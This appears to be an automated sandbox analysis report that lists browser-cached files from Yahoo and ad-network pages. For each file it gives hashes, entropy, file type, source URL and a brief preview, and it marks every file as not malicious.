                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:var Oc=Object.create;var gi=Object.defineProperty;var Ac=Object.getOwnPropertyDescriptor;var Ic=Object.getOwnPropertyNames;var xc=Object.getPrototypeOf,Rc=Object.prototype.hasOwnProperty;var p=(e,r)=>()=>(r||e((r={exports:{}}).exports,r),r.exports);var kc=(e,r,n,s)=>{if(r&&typeof r=="object"||typeof r=="function")for(let d of Ic(r))!Rc.call(e,d)&&d!==n&&gi(e,d,{get:()=>r[d],enumerable:!(s=Ac(r,d))||s.enumerable});return e};var Fe=(e,r,n)=>(n=e!=null?Oc(xc(e)):{},kc(r||!e||!e.__esModule?gi(n,"default",{value:e,enumerable:!0}):n,e));var fe=p((qt,mi)=>{"use strict";var dr=function(e){return e&&e.Math===Math&&e};mi.exports=dr(typeof globalThis=="object"&&globalThis)||dr(typeof window=="object"&&window)||dr(typeof self=="object"&&self)||dr(typeof global=="object"&&global)||dr(typeof qt=="object"&&qt)||function(){return this}()||Function("return this")()});var se=p((Ty,yi)=>{"use strict";yi.exports=function(e){try{return!!e()}catch{return!0}}});var ge=p((qy,bi)=>{"use strict";var Pc=se();bi.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (8260), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):8260
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.238261028208202
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:L2JhEpTVHpBTRgbW8DdlWzMEqt16lOTlKW5BCNaCV5WgeTYy3:L2JhEjpBKC8DjWpc16oBKAAaqeky
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:DFA69F455EFA8A49A71AF52519927C3F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:07E3A5A50D74E9150408B2D5A50AE1242F6A5A33
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:6014DBEF5594ADD5F4104CE8597BC8C6B755E9DCA6B32E40EB04246E55588406
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:72673CB76FB5C77B570C44AD5A156DD634C9E57E8C1FF0845C9C021FA492061804FE07C7C8CBEEA8049C3644C4352C17A575903428C1ACC00255E38C27F4D010
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/aaq/wf/wf-autocomplete-1.31.8-modern-a4f31e10ae.chunk.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:webpackJsonpwafer_wafers_wafer_autocomplete([0],{"./src/types recursive ^\\.\\/.*$":function(e,t,r){function a(e){return r(s(e))}function s(e){var t=i[e];if(!(t+1))throw new Error("Cannot find module '"+e+"'.");return t}var i={"./aol-location":"./src/types/aol-location.js","./aol-location.js":"./src/types/aol-location.js","./aol-markets":"./src/types/aol-markets.js","./aol-markets.js":"./src/types/aol-markets.js","./aol-recipes":"./src/types/aol-recipes.js","./aol-recipes.js":"./src/types/aol-recipes.js","./gossip":"./src/types/gossip.js","./gossip.js":"./src/types/gossip.js","./sports-teams":"./src/types/sports-teams.js","./sports-teams.js":"./src/types/sports-teams.js","./weather":"./src/types/weather.js","./weather.js":"./src/types/weather.js"};a.keys=function(){return Object.keys(i)},a.resolve=s,e.exports=a,a.id="./src/types recursive ^\\.\\/.*$"},"./src/types/aol-location.js":function(e,t,r){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),r.d(t,"getListMarkup",functi
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x156, components 3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):21302
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.965105475522827
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:Uj6fB/FoayHPCuxI4p1srrUqP1jLtvZlTG6nrc2jPnvAToR:O6fpOajuxIoYoqP1jpnThlnIToR
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:8DE001277BD6BAB7650227703EE6B4E0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:F6B403E183A996178DC4B7A217DB032AFADB40A0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:22B71A85C94E99E8E649248BA4217C0BDEF1A5C1F9AB5CCE30DACBC9BF3F216A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:C18EB1F4FA3B083653D71611B5C3876ADC0B8182C6ED3950342C6CE3712FCD397DC5B0E10D26C9D13A4F0124EF881281861F257AE7E89A842B965CAB40F1539B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:......JFIF.............C....................................................................C.........................................................................,............................................K..........................!..1A"Qa.2q....#B..R...3b..$Cr...s...4DESc......................................8.........................!.1A..Q"2.#B.$3aq.4Rb.....C..............?.s..c.........U..].........LFZ.PN...K#..)...W.5:.6.Tb..6M.........>...x.k....!U...yM..Z.P.k..8.9..LL....\..Z.W...O.N'.."5.."!a..y.6..6U..._..q.63U...T...[!..-.....j..%..\:...aO..fH..m.P.k.v..Z%.E..>...-..%ZH$..,...~..s..g1..U.O?...h.-n..n...v......d.io...Y...-.....+c....y.e..X.dQ..<..$.Y-.bV...I.....l0%..X.'f..j.%P.....{..N..o...|.'...E....u/.$[V,.dx#M.8..b..k*..!.<H..k.....fR..%..7.G..-d..t..O....:V.B......a....^T..m...]q...E*.A.}q.W..KC...J......-..G...z...!.....GH .].B.x....{..M.8......iF....:...M.!.kZl.{o...6..uZ...x3..9</(I..JU....U.,mE..r....r..XN.........T.Yf.V ...r!
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (13723)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):13724
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.376583319608237
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:JVBETyWZS2FRf2ASYTqZHXED8cfBMMJgHAotaBOXDA9zHbW1:J8HZLF0ASYTqZUNbAAoQIDA9z7W1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:41566212370832009146DAB38FEB44C5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:54841FE1A94FB6613E29A646CD673EC22D2509D4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:4D0F0A2A6BF3F8EC6332E63B0D9E2DB99CF8966C4385B773FEFA8D032511DA77
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:068EB00F3CF4C6D1815D2409E21E91A2C9918CA346ADF8DEF0E270C65BFC5649530FBAB5F08E9B65A87E0B0E9EB87F186AE2E0C17F087E8D0B242A66B832056F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as R,p as S,k as b,n as C,i as p,I as he,e as L,d as z,f as $,q as k,_ as Q,N as X,x as de,b as M,j as E,l as H,o as Y,c as ge,u as pe,g as ke,a as be,A as ye,a0 as we}from"./scheduler.Dr9AAxFe.js";import{S as q,i as B,c as y,b as w,m as v,t as m,a as _,d as I,g as A,e as T}from"./index.DCSmZEjO.js";import{e as D,u as ve,o as Ie}from"./each.BExQfwb4.js";import{g as Se,a as Ne}from"./spread.CgU5AtxT.js";import{g as j,n as Ae,a6 as Z}from"./commonUtil.CI22_Irn.js";import{I as Te}from"./InfiniteScroll.Bb79EfyN.js";import{S as Me}from"./Spinner.CydnjLPC.js";import{a as Ee}from"./StoryItem.BxM_Sc_7.js";import{a as Le,D as ze}from"./DynamicDisplayAd.DfKC339X.js";import{c as $e}from"./ads.DhuB_mth.js";import{S as P}from"./SkeletonLoader.B0llAjab.js";import{N as Ce}from"./NoContent.B0omCaLg.js";function x(a){let e,l,t,n,o,r;return{c(){e=L("div"),this.h()},l(s){e=z(s,"DIV",{id:!0,class:!0,"data-testid":!0,"data-ad-mode":!0,"data-ad-region":!0,"data-ad-placement":!0,"data-ad-target-type
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (913)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):914
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.264277132285632
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:jpd8qJGpAjGpAISr6cjaMOvM6bFu1IMBLt3CTgM94ctRD:jp+4kur/a1k6fTgG4ct5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:1FD70179761FDF78FADDE8C139B3D8BF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:3BE09A0866C5098B3E373A466C8727346DFF5CEA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B384D480521A4AA2916EBFB0FC238BDF7837A57B6651FEC7FC70E21006CFA431
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:21EE4C75D6512C8ECD18DE3E2EFFCD8B45B55E82E7D210A3920FC37A23CC06980D45A4BECD22CFE729E705EBFAF023572F97E4976B6182D185BBE183D90DD474
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{a as q,t as z}from"./index.DCSmZEjO.js";import{v as B}from"./scheduler.Dr9AAxFe.js";function F(n){return(n==null?void 0:n.length)!==void 0?n:Array.from(n)}function G(n,f){n.d(1),f.delete(n.key)}function H(n,f){q(n,1,1,()=>{f.delete(n.key)})}function I(n,f,k,C,x,g,h,A,p,_,w,j){let i=n.length,d=g.length,c=i;const a={};for(;c--;)a[n[c].key]=c;const l=[],u=new Map,m=new Map,v=[];for(c=d;c--;){const e=j(x,g,c),s=k(e);let t=h.get(s);t?v.push(()=>t.p(e,f)):(t=_(s,e),t.c()),u.set(s,l[c]=t),s in a&&m.set(s,Math.abs(c-a[s]))}const M=new Set,S=new Set;function y(e){z(e,1),e.m(A,w),h.set(e.key,e),w=e.first,d--}for(;i&&d;){const e=l[d-1],s=n[i-1],t=e.key,o=s.key;e===s?(w=e.first,i--,d--):u.has(o)?!h.has(t)||M.has(t)?y(e):S.has(o)?i--:m.get(t)>m.get(o)?(S.add(t),y(e)):(M.add(o),i--):(p(s,h),i--)}for(;i--;){const e=n[i];u.has(e.key)||p(e,h)}for(;d;)y(l[d-1]);return B(v),l}export{G as d,F as e,H as o,I as u};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):47
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.240239117404927
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:JS+DgWAsDQAfn:88UsDpn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:C26019C2D1F82BB418B2A56B2BACB59B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:B11220F5F962FAECC8E9835210C78EA7F87993BA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:09343D3B3473E1C994B2D603C99FEB8A0F63FBD3FF20BE7432FF18B973DBE651
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:AE42A74AE1E4AAEDA412ABBEFF6D9072A216C37CE343B103EE5FBABCD58EB9FE4CA7D4AE69D8EDD496F0F3793FBA03FBE7EE7B5C80A6AAE30D1E12B08D53CE9D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:PubMatic.PugMasterCallback(false, false, true);
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (1796)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1797
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.350569922813382
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:fXKDdg7g1tTxtqzuFIGgp72jAEDv8aWZkMV+Pt:fXCPrYuF/g52j5z1p
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:07CFBA027B3A69A6F9EEBA4A61682B76
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:74E814755C7073E450764B1BF637DFAFA7C7E4B3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:ECBF83FBCA4A0781B29CE20A273ED231B4E9A797F89458DCC663FCC0D62758A1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:89A84B305EA5998865C65811C139D1DC5D3DDCC88127F8B4AFBAEA213110AF8B220CF7434AE2F27C6416FBC9640AE90FFA87B97F029381F334D2054898214B87
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as p,e as k,d as S,f as V,N as m,k as c,i as f,t as y,h as q,m as v}from"./scheduler.Dr9AAxFe.js";import{S as L,i as M,c as Q,b as w,m as z,t as D,a as C,d as I}from"./index.DCSmZEjO.js";import{L as N}from"./Link.Cll6KZpb.js";import{o as u}from"./commonUtil.CI22_Irn.js";function U(s){let t;return{c(){t=y(s[1])},l(n){t=q(n,s[1])},m(n,l){c(n,t,l)},p(n,l){l&2&&v(t,n[1])},d(n){n&&f(t)}}}function W(s){let t,n,l;return t=new N({props:{href:u({symbol:s[1]}),size:s[2],variant:"loud",i13nModel:{elm:"ct",elmt:"qte",sec:s[0].options.meta.rapidSec,slk:s[1],...s[0].options.meta.subSec?{subsec:s[0].options.meta.subSec}:{},...s[4]},$$slots:{default:[U]},$$scope:{ctx:s}}}),{c(){n=k("div"),Q(t.$$.fragment),this.h()},l(e){n=S(e,"DIV",{style:!0});var a=V(n);w(t.$$.fragment,a),this.h()},h(){m(n,"display","contents"),m(n,"--link-font-weight",s[3])},m(e,a){c(e,n,a),z(t,n,null),l=!0},p(e,[a]){const o={};a&2&&(o.href=u({symbol:e[1]})),a&3&&(o.i13nModel={elm:"ct",elmt:"qte",sec:e[0].options.meta.rapid
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (419)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):420
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.646165904554131
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6:BC69mc4sl3O4b1/3mjGVuNM3r2Gi2i4gc13UXc7Rig8PhCR0V+v4v:061Pb1ej2Fr2iLgS3OIARE4v
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:B2A9502704DCBABFBA520502814A7F60
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:653E95FEF2F6F4A50F0AC9F254F65A5FEFC2F7D3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:3305A6BA0F384325F4050D2E0042DAD3F96498116955274B4E1A633640336B6E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:1035B0C6FFD0F5AA3E07E14C9B4FAA3874A6FF2BFC5104CD6F54A4BD79BF3D5E7727A1C486CACE2628E1261C59A856BFC702D1223081569FDA3C6A0771B7ACAD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/link_off.MpzrwDsW.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:const h='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M14.39 11 16 12.61V11zM17 7h-4v1.9h4c1.71 0 3.1 1.39 3.1 3.1 0 1.27-.77 2.37-1.87 2.84l1.4 1.4A4.99 4.99 0 0 0 22 12c0-2.76-2.24-5-5-5M2 4.27l3.11 3.11A4.99 4.99 0 0 0 2 12c0 2.76 2.24 5 5 5h4v-1.9H7c-1.71 0-3.1-1.39-3.1-3.1 0-1.59 1.21-2.9 2.76-3.07L8.73 11H8v2h2.73L13 15.27V17h1.73l4.01 4.01 1.41-1.41L3.41 2.86z"/></svg>';export{h as U};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUkxl7/lHh/:slf/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:B4491705564909DA7F9EAF749DBBFBB1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:279315D507855C6A4351E1E2C2F39DD9CD2FCCD8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:4E0705327480AD2323CB03D9C450FFCAE4A98BF3A5382FA0C7882145ED620E49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B8D82D64EC656C63570B82215564929ADAD167E61643FD72283B94F3E448EF8AB0AD42202F3537A0DA89960BBDC69498608FC6EC89502C6C338B6226C8BF5E14
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://ox-rtb-europe-west1.openx.net/win/prebid?p=FIRST&t=2DAABBgABAAECAAIBAAsAAgAAAhkcGApQQW5JWmFqdHcxHBawp4rUiqre8csBFqerg8Pi5pz60wEAHBb8nurSx8yYzfEBFvflzoKm7_KtjwEAFqCTrPAMFQY4JDM4NGUzOTlhLTgzYmEtMGM0Zi0yZDg3LTRlMmEyYjBlMzdlNRwVBBgTZWZmZWN0aXZlX2JpZF9wcmljZRgHY29udHJvbAAALBwVAgAcFQIAHBUCABwVAgAAHCbU-9SWBBUENrTu1JYEFtiHn4AEJQIVAqaiBxaiBxaiBxYUFhQWFBYUFrAKFqIHFqIHABwcLBaAsYqku-yDrSoW67K12efigOelAQAAFrzZmIAEFp7looAEFt64tYAEFtbuqYAEFRgcFLQBFLALABUEJrAKFrAKFsQKETUOJsQKNAIALCwW2IiKs7DU8Nf6ARbH8sD1g5nuhtsBABagk6zwDAYovNmYgAQWnuWigAQW1u6pgAQW3ri1gAQYCTYwMDY3MzU3NhbKHRbECiUEFoYDGAczMDQ2ODM0FQKhERgCT1gIfgNydGIAHDUGGA1PWC1URU8taVphcEdVFhRcLBaAsYqku-yDrSoW67K12efigOelAQAAFvr3wZMEFvj3wZMEAByWFBe4HoXrUbiOPxYUGAk1NjEwMzg5ODYAvBsBiB5NTF9GRUVfT1BUSU1JWkVSX0lOU1RBTkNFX1RZUEUFb3RoZXIArDgMdC1tb2JpbGUuY29tAAAA&ph=c2321ff9-d50d-4965-896f-6a7eb778bfb5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 536x284, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):15678
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.990037743881062
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:6WsWZvidxGe1GkhoRE7UCzOotvwciNXZAlm3:sYvi/GeDXfhwcaXZA03
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:8754783BF010539BBE6560DA8BD7B351
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:0B5F026A35871CCCB29BFA6A8B76B635CDC4CEAD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:AB8A64E2BB57BD431300A784DD2F8DA945B0AD82E035AF8531E40FBFDE4849D4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:75E733D35CE20A7B3E07F11B8834B3BDE652618BB36B2B777445ED39CFEF478E2DDDC9EF52668ED3333507A81D037F79675C8FB5EB144D737E02D4172F4156AA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/uu/api/res/1.2/8Sig4ocDKNR5dhitUx31wg--~B/Zmk9c3RyaW07aD0yODQ7cT04MDt3PTUzNjthcHBpZD15dGFjaHlvbg--/https://media.zenfs.com/en/in_touch_weekly_336/3222bbad9324529b020253049d71963d.cf.webp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:RIFF6=..WEBPVP8 *=.......*....>y6.H$..%..K....cn......G.7.|.97.o..9.}.{.>..6.f.#=7^.}4.q.....#y5.o........nh}...O.......7............J ..g.......^...}#...9.....W.G...f..#.....j...^.....->..,...s...o>......oF.l....q~%C...`hz.i......l.t..J...wW..aI..2...^.QE.ze......d..h..(....9@....7.@9.....l...:..4.9...?."&..u{_.Zg...z.......n...d+tI.Tm...3...a.H.Py*;.63.Mx.n.[.....b.^..s ...@KZ...,.^rH.58....TP...{M...&..].f.....pk...^bU..<d....NZ.....uE...l....e\.M-}2.~....v.c..).......:p}+.'....8.7.....xyHQ.?^.p#.m.....f.g..}.t.)...F.;GD.-y...Z..D..gn..N]..j...F?..Jk.W.6.b..IBR.....%..../>L..T].%.u.;.-.(.`.]....l..~..J.+.^..B....W......*.&|."..\....HF../ZM.....A..+.......8.s.BS..B.DS2:a.8D..n.9M..dK D.5qe...j..!.....i..0..S..`.]...@.E.'cSJ.....}4.....y.5...vc...R.W. FC.g.e<..........Lh.z.A.<....!........L.c.t......=.L...0.M..Z[.Z.J.....c..y...,:<.@...W.<c:q.A.....9..i.....g\...8x...e.0.8.zH.@+M.B....M.2.w..0.WPZ30....\u.H..D...Ns....C..2&O......p..B.:.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):824854
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.752345030018875
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:pZYzyll2vVtYoyWlepCbe/g3o5OG/JEmiOW2FvKE0PYZYvjbRY5yhlMNYlYXjGxV:Iv+pCbe/g3o5OG/JEmiOW2FvKEAb
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D167BA9E2626514687E93C57BBC2853F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:459A2B3E5ED11F89BDE5D125C464FE4ED867159F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:7E13DC73C2BE40CFEA3F7D199AF72BAB5ABB2129873B3CA08C5595AC109C0FB1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F04FEA8E10C2E5ABCF968A547E0B0E5D2547453BB3C1BC8C4BCC1F0C976AA873163F5B8FB3E0882D66514EE95037115C8CA909598255F5CCE8AA63C3EBC8C963
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:{"items":[{"data":{"partnerData":{"adMeta":{"hashtag":"news;trending;trending-news;update-me;weather;naturalphenomena;natureandenvironment","isSupplySegment":"false","lang":"en-US","region":"US","rs":"lmsid:a077000000CFoGyAAL;revsp:Yahoo! News;lpstaid:763792a6-0264-4c09-8fdc-ad4e3aa042d8;pt:content;pd:modal;ver:megastrm;pct:story","site_attribute":"wiki_topics=\"National_Hurricane_Center;Storm_surge;Florida;Saffir%e2%80%93Simpson_scale;John_Milton;Florida_Keys;Hurricane_Helene_%281958%29;Tropical_cyclone_scales;Tropical_cyclone_warnings_and_watches;Ron_DeSantis;Landfall;Atlantic_hurricane_season;Suwannee_River;Tampa_Bay_area;Maximum_sustained_wind;West_Coast_of_the_United_States;Bonita_Springs,_Florida;East_Coast_of_the_United_States\" ctopid=\"1985000;12818000\" hashtag=\"news;trending;trending-news;update-me;1985000;12818000\" rs=\"lmsid:a077000000CFoGyAAL;revsp:Yahoo! News;lpstaid:763792a6-0264-4c09-8fdc-ad4e3aa042d8;pt:content;pd:modal;ver:megastrm;lu:0;pct:story\"","spaceid":"1197
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (2727)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2728
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.9334139279708635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:6VailSKNw5UaAwO5mbVD5wSsOMOHnkpTH5Ilt/ljNNlVQ6CusntrRIOjCwetsPi3:mdSCsOGYGJjjN4FI6s
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:04E070CFCF559C1DBECB480C125C31C5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:E1CBBFC6C79F56F81DCA41570594C4A353EDFCEC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:F1BD36804711528524A6597C36E968FE35B6299AF3C1731D455DFE70EF57C642
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:61154F22277F04543C72FAE988CC96403C30AB10168581F1258E97EF495C99DADC481CDC1A9860182E2542E8AD535EEB6F5D8A7542ED9F624F96B21F9C775F65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/assets/HeatMap.v9WG23fw.css
